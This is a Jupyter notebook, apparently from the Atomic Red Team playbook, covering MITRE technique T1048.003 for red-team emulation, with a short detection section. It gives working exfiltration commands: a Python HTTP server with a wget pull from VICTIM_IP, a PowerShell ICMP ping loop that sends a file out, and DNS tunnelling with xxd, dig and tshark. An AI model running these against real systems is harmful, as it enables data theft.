{
 "cells": [
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "# T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol",
    "\n",
    "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. "
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Atomic Tests"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "#Import the Module before running the tests.\n# Checkout Jupyter Notebook at https://github.com/haresudhan/TheAtomicPlaybook to run PS scripts.\nImport-Module /Users/0x6c/AtomicRedTeam/atomics/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1 - Force"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #1 - Exfiltration Over Alternative Protocol - HTTP\nA firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.\n\nUpon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.\n\n**Supported Platforms:** macos, linux\nRun it with these steps!\n1. Victim System Configuration:\n\n    mkdir /tmp/victim-staging-area\n    echo \"this file will be exfiltrated\" > /tmp/victim-staging-area/victim-file.txt\n\n2. Using Python to establish a one-line HTTP server on victim system:\n\n    cd /tmp/victim-staging-area\n    python -m SimpleHTTPServer 1337\n\n3. To retrieve the data from an adversary system:\n\n    wget http://VICTIM_IP:1337/victim-file.txt\n"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #2 - Exfiltration Over Alternative Protocol - ICMP\nExfiltration of specified file over ICMP protocol.\n\nUpon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.\n\n**Supported Platforms:** windows\n#### Attack Commands: Run with `powershell`\n```powershell\n$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path C:\\Windows\\System32\\notepad.exe -Encoding Byte -ReadCount 1024) { $ping.Send(\"127.0.0.1\", 1500, $Data) }\n```"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": null,
   "metadata": {},
   "outputs": [],
   "source": [
    "Invoke-AtomicTest T1048.003 -TestNumbers 2"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "### Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS\nExfiltration of specified file over DNS protocol.\n\n**Supported Platforms:** linux\nRun it with these steps!\n1. On the adversary machine run the below command.\n\n    tshark -f \"udp port 53\" -Y \"dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches \".domain\"\" >> received_data.txt\n\n2. On the victim machine run the below commands.\n\n    xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done\n    \n3. Once the data is received, use the below command to recover the data.\n\n    cat output_file | cut -d \"A\" -f 2 | cut -d \" \" -f 2 | cut -d \".\" -f 1 | sort | uniq | xxd -p -r\n"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {},
   "source": [
    "## Detection",
    "\n",
    "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) "
   ]
  }
 ],
 "metadata": {
  "kernelspec": {
   "display_name": ".NET (PowerShell)",
   "language": "PowerShell",
   "name": ".net-powershell"
  },
  "language_info": {
   "file_extension": ".ps1",
   "mimetype": "text/x-powershell",
   "name": "PowerShell",
   "pygments_lexer": "powershell",
   "version": "7.0"
  }
 },
 "nbformat": 4,
 "nbformat_minor": 4
}